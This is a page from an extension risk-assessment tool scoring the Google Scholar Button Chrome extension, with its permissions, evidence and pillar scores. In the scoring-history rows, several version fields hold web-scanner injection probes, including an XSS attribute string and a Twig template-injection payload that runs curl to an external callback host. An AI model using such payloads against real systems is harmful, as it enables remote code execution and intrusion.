Netskope Extension Risk

Detail view · rubric v3.6
← Back to catalog

Google Scholar Button

ldipcbpaocekfooobnbcddclnhejkcpn
Risk Score
3.20
Risk Level: Low
Recommendation: 🟢 LOW RISK — review
Category Productivity
Installs 3,000,000
Rating 4.6
Last updated 2024-05-16 (27 months ago)
Manifest version MV3
CSP present ❌ no
Developer scholar-chrome-extensions@google.com
Verified publisher ❌ no
Featured by Google ✅ yes
Privacy policy link
Web Store open ↗

Top Risks

  • Privacy policy is Google's generic corporate policy (policies.google.com) — scope_extension==false, data_collection==true, third_party_sharing==true: triggers +10.0 privacy under v3.5 rule D.
  • Extension not updated in 25 months — stale but still widely deployed to 3M users.
  • innerHTML DOM-XSS sink in popup-compiled.js; no CSP present to mitigate.
  • v3.5 invariant 0c applies: verified-publisher discount capped at -1.0 due to months_since_update > 18.
  • MV3 with no CSP: no +2.0 network penalty (MV3 exempt), but DOM sink risk elevated by csp_present==false.

Evidence

  • developer_identity store Email scholar-chrome-extensions@google.com; brand_mention.confirmed_owner=true; is_impersonation=false; recognized Google org.
  • privacy_policy_generic api policies.google.com policy: fetched=true, scope_extension=false, data_collection=true, third_party_sharing=true → +10.0 privacy (rule D).
  • maintenance_stale store Last updated May 2024; 25 months since update → +6.0 maintenance. Invariant 0c caps org discount to -1.0.
  • dom_xss_sink crx popup-compiled.js: innerHTML assigned from variable with no CSP; obfuscation_score=0.0; no eval/fetch findings.
  • host_permissions_narrow manifest host_permissions limited to *://scholar.google.com/ — single first-party domain, minimal reach.
  • featured_by_google store is_featured_by_google=true; -2.0 reputation discount applied (featured badge).
  • no_bad_hosts api threat_intel: bad_host_hits=[], affiliate_hits=[], monetization_hits=[], looks_throwaway=false.
  • cve_clean crx cve_findings_raw=[]; js_libraries_detected=[]; CVE pillar=0.0.

Permissions Breakdown

  • storage low Local preference storage; low exfil risk in isolation.
  • activeTab low Scoped to user-initiated action on current tab only.
  • scripting medium Allows JS injection into pages; paired with narrow host_permissions limits blast radius.
  • *://scholar.google.com/ (host) low Single first-party Google domain; narrow and matches stated function.

Pillar Scores

Permissions1.30
Reputation2.00
Network0.00
Webstore1.50
Maintenance6.00
Privacy10.00
Code Quality2.00
CVE Exposure0.00

Scoring History

%F6"onmouseover=7AoP(90105)// 4.14 Medium review 2026-08-05
1}}"}}'}}1%>"%>'%><%={{={@{#{${dfb}}%> 4.39 Medium review 2026-08-05
<th:t="${dfb}#foreach 4.11 Medium review 2026-08-05
v3.6&n979231=v991361 4.07 Medium review 2026-08-05
{{_self.env.registerUndefinedFilterCallback("system")}}{{_self.env.getFilter("curl hitccydwrzvdj20290.bxss.me")}} 3.38 Low review 2026-07-29
v3.6 3.20 Low review 2026-06-16

Bookkeeping

Rubric v3.6
Scored at 2026-06-16 07:51
Listing SHA d6104a2cacee…
Force block — not fired
Score recovered no
Elapsed 24.6s